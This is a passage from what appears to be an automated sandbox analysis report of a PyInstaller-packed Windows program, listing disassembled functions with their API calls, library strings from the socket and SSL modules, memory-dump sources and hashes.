                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949490443.00007FFBA421F000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949749489.00007FFBA4220000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949783531.00007FFBA4222000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba4170000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007F6570
                                                                                                                                                                                                                                  • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                  • API String ID: 118773457-87138338
                                                                                                                                                                                                                                  • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                  • Instruction ID: d7a16e34eeaa8fe24f153d8dbe075dd92e105d838e28e21600838a6dd6b4e54c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3641C5B2B0A642C6E7229B25E4842696B51EB90794F544230EF5947EF9DF3CE5068F40
                                                                                                                                                                                                                                  Function 00007FFBA60919DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007A6164
                                                                                                                                                                                                                                  • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                                  • API String ID: 2890651461-1778748169
                                                                                                                                                                                                                                  • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                  • Instruction ID: 2a913265f873bb001c7c1028b0ea939e71ada15abaaf031b4ec98a8a521fbde5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C4194E5E1BA83D4FEA39F71D49037822A2AF51F88F194634DE1D4B789CF2CA8518310
                                                                                                                                                                                                                                  Function 00007FF72C657E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF72C65352C,?,00000000,00007FF72C653F23), ref: 00007FF72C657F32
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                  • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                  • Instruction ID: 3ab870406fbb125b25def75207c35beec4136f729361646222f73b7df737d243
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC31E921729AC145EA32AB10EC103AAA256FF94BF0F900630EB6D437C9DE2CD205CB10
                                                                                                                                                                                                                                  Function 00007FFBAA492940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ComputerErrorLastName
                                                                                                                                                                                                                                  • String ID: socket.gethostname
                                                                                                                                                                                                                                  • API String ID: 3560734967-2650736202
                                                                                                                                                                                                                                  • Opcode ID: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                                  • Instruction ID: 514bcb732f33c75593ab8443702302d79d34c7a8deacfdfe5c0ab9b1cfcefea6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 617a79839054c1372f9b5dcd0bed18d2927316b1072d0d7780bbcd75c64f5621
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A3121A5B0E642C2F6268B31E8D427E63ADFF89B95F440075ED4E42765DF3DE0268620
                                                                                                                                                                                                                                  Function 00007FFBAA498360 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: inet_ntop
                                                                                                                                                                                                                                  • String ID: invalid length of packed IP address string$iy*:inet_ntop$unknown address family %d
                                                                                                                                                                                                                                  • API String ID: 448242623-2822559286
                                                                                                                                                                                                                                  • Opcode ID: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                                  • Instruction ID: 121af9d5ad79ef54ad1d3e37c0994d36d2ce1f0489c061aa85d03bdc1970b15d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08a000b3334927d59a117a8bb923774045009f39c870e28a4b7b73a9ae5cd575
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45311CA1A1E983C1FA628B34E8D46BD2368FF84B44F500471ED4E83675DF2DE46A8761
                                                                                                                                                                                                                                  Function 00007FFBAA495BA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: getsockopt
                                                                                                                                                                                                                                  • String ID: getsockopt buflen out of range$ii|i:getsockopt
                                                                                                                                                                                                                                  • API String ID: 3272894102-2750947780
                                                                                                                                                                                                                                  • Opcode ID: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
                                                                                                                                                                                                                                  • Instruction ID: 24ea6b1481d077c655b0aa536ddd69d64b3e57bf30ccc5278e7969774aac167c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c8cce7771d3f24cc9ac2e410138943029079e80a9b5900f9f3c000819b3f68c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42310AB2A1AA46C7EB158F34E4C056E73A8FB84B44F600179FA4E42764DF3DD46ACB50
                                                                                                                                                                                                                                  Function 00007FF72C652810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                  • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                  • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                  • Instruction ID: efc2cc75949c28834838293192019e9b07c730c3f009e7eae94369211073c948
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E21F332708B4192E711AB54F8453EAB3A1FB98790F800136EA8D53659DF3CD259CB50
                                                                                                                                                                                                                                  Function 00007FFBAA497AA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: gethostbyname
                                                                                                                                                                                                                                  • String ID: et:gethostbyname_ex$idna$socket.gethostbyname
                                                                                                                                                                                                                                  • API String ID: 930432418-574663143
                                                                                                                                                                                                                                  • Opcode ID: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
                                                                                                                                                                                                                                  • Instruction ID: f5e9d5a376c2f645ccf1f14efd89d1a6079768f8f7a2d66662487130bd58e3e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 763fd7e5a6e8485f873114a20fb6e7adcccc8433eb82f096b660c8048ead8007
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 842165A170AA82C1FA518B72E4C47AE6368FB88BC4F440176EE4D43B55CF3DD516C760
                                                                                                                                                                                                                                  Function 00007FFBAA4984B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: inet_pton
                                                                                                                                                                                                                                  • String ID: illegal IP address string passed to inet_pton$is:inet_pton$unknown address family
                                                                                                                                                                                                                                  • API String ID: 1350483568-903159468
                                                                                                                                                                                                                                  • Opcode ID: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
                                                                                                                                                                                                                                  • Instruction ID: 09f0c2191dd6815491ebe0b435c05dfd3c88388275d2758085b6ba9f03c1c9ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26846f0312d1f675127fc7a928663de3b4f9f1fae969a89936cdafc1ca1b6d0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F2130A1A1E942D1FA629F34E4C017D2369FF84B94F900471FD4E826B5DF2DE52AC720
                                                                                                                                                                                                                                  Function 00007FF72C66C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                  • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction ID: 8b524a3827706a60c711ccd8df38208960b7ce08d737fe9669f057a6b4006148
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17D10672B08E8199E712DF65C8402AC77B3FB647A8B944239DE5E97B85DE3CD006CB50
                                                                                                                                                                                                                                  Function 00007FF72C66CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D07C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72C66CF4B), ref: 00007FF72C66D107
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                                                                                  • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction ID: dad23c8e41addc558e5eaa13b3d2361447927d0d7230b50109a2f48c02d4c527
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0791D632E1865195F752AF669C4027DBBB2FB647A8FA4413DDE0E53684CE3CD442CB20
                                                                                                                                                                                                                                  Function 00007FF72C66F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                                                  • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction ID: e798a9ff5af1f77481553a2b50c57e67a3fc125e8c1208f250ac492d15c85b07
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251F472F042118AFB15EB749D556BCB7A2FB64378FA00239DD1E52AE5DB3DA4028B10
                                                                                                                                                                                                                                  Function 00007FF72C66577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                                                  • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction ID: 456a85463ffdc7f94a5d37425dee7b1e58438086be9ef758e12bc11d0159c845
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30518E22E046418AF711EF61D8513BDB7B2FB68B68F644539DB0947B88DF3CD4408B60
                                                                                                                                                                                                                                  Function 00007FF72C6520C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                  • String ID:
